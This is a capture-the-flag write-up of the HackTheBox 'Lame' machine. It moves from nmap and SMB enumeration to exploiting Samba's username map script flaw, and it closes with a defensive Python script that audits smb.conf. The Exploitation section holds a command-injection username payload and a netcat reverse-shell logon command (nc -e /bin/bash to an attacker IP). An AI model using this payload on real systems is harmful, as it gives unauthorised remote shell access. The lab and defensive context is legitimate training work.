Hi everyone
Today we are going to look at a Linux box called Lame, which is rated Easy in difficulty. Working through this machine involves several phases: Recon, Enumeration and Exploitation.
Box Type: Linux
Recon & Enumeration
Enumeration plays a very significant role in pen testing: the more thoroughly you enumerate, the easier it is to get a foothold on the target.
First, we will check whether the target is reachable with the ping command:
ping Target_IP

The ping output shows that the target is reachable.
Now let’s move ahead and run a port scan. For this we will use Nmap, a popular port-scanning tool that reports which ports are in the Open state and details about the services behind them. The command for that will be:
nmap -sC -sV -O -oA nmap/initial 10.129.144.85
Now let’s also execute the full scan:
nmap -sC -sV -O -p- -oA nmap/full 10.129.144.85 -T4

We discovered that these ports are open:
- 21/tcp – FTP service running vsftpd 2.3.4
- 22/tcp – SSH Service running OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
- 139/tcp – netbios-ssn service running Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
- 445/tcp – netbios-ssn service running Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
- 3632/tcp – distccd running service distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
- OS: Linux
Let’s move ahead and check the FTP service:

After that I went ahead and checked for exploits with searchsploit:

The above output tells us that the machine is not vulnerable to the vsftpd backdoor.
After that I used a tool called smbclient, which allows you to interact with SMB (Server Message Block) shares on remote systems. I used the following command to list the SMB shares available on the target system:
smbclient -L 10.129.144.85

Then I used another tool called smbmap for enumerating and interacting with SMB shares. I used the following command to check the permissions on the share drives:
smbmap -H 10.129.144.85
From its output I can see that the tmp folder has READ, WRITE access:

Exploitation
I started looking for exploits and found one; the link is mentioned below:
https://www.exploit-db.com/exploits/16320
The vulnerability exists in the username map script functionality. The exploit script sets the username to the following value, where “payload.encoded” represents a reverse shell payload that establishes a connection back to our authorized penetration testing machine:
username = "/=`nohup " + payload.encoded + "`"
logon "./=`nohup nc -nv 10.10.14.69 7779 -e /bin/bash`"

The above image shows the user.txt flag.
Key Takeaways
- Anonymous SMB access should be restricted
- Service accounts should follow principle of least privilege
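As an added example that is not part of the original writeup, a small audit script for an smb.conf that flags the two weaknesses behind these takeaways: the username map script directive the exploit abuses, and shares that are both guest-accessible and writable, like the tmp share found with smbmap. The sample configuration is constructed, not taken from the box.

```python
"""Audit an smb.conf for the weaknesses behind the takeaways above.
Added example, not code from the original post; the sample config is constructed."""
import configparser

# Constructed sample in the spirit of the target's Samba 3.0.20 setup.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh

[tmp]
   path = /tmp
   read only = no
   guest ok = yes

[homes]
   path = /home/%S
   read only = yes
   guest ok = no
"""

TRUE_VALUES = {"yes", "true", "1"}

def _is_true(value):
    return value.strip().lower() in TRUE_VALUES

def _writable(share):
    # Samba accepts 'writable'/'writeable' or the inverse 'read only' (default yes).
    for key in ("writable", "writeable"):
        if key in share:
            return _is_true(share[key])
    return not _is_true(share.get("read only", "yes"))

def audit_smb_conf(text):
    """Return (section, finding) tuples for the risky settings this box had."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    cp.read_string(text)
    findings = []
    # The exploit above abuses 'username map script'; an unpatched Samba should not set it.
    if cp.has_section("global") and cp["global"].get("username map script"):
        findings.append(("global", "username map script is set; remove it or patch Samba"))
    for name in cp.sections():
        if name == "global":
            continue
        share = cp[name]
        anonymous = _is_true(share.get("guest ok", "no")) or _is_true(share.get("public", "no"))
        if anonymous:
            level = "write" if _writable(share) else "read"
            findings.append((name, f"anonymous {level} access"))
    return findings
```

Running audit_smb_conf on the sample reports the global directive and anonymous write access on tmp, while the homes share passes.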
If you enjoyed this post, share it with your friends and colleagues!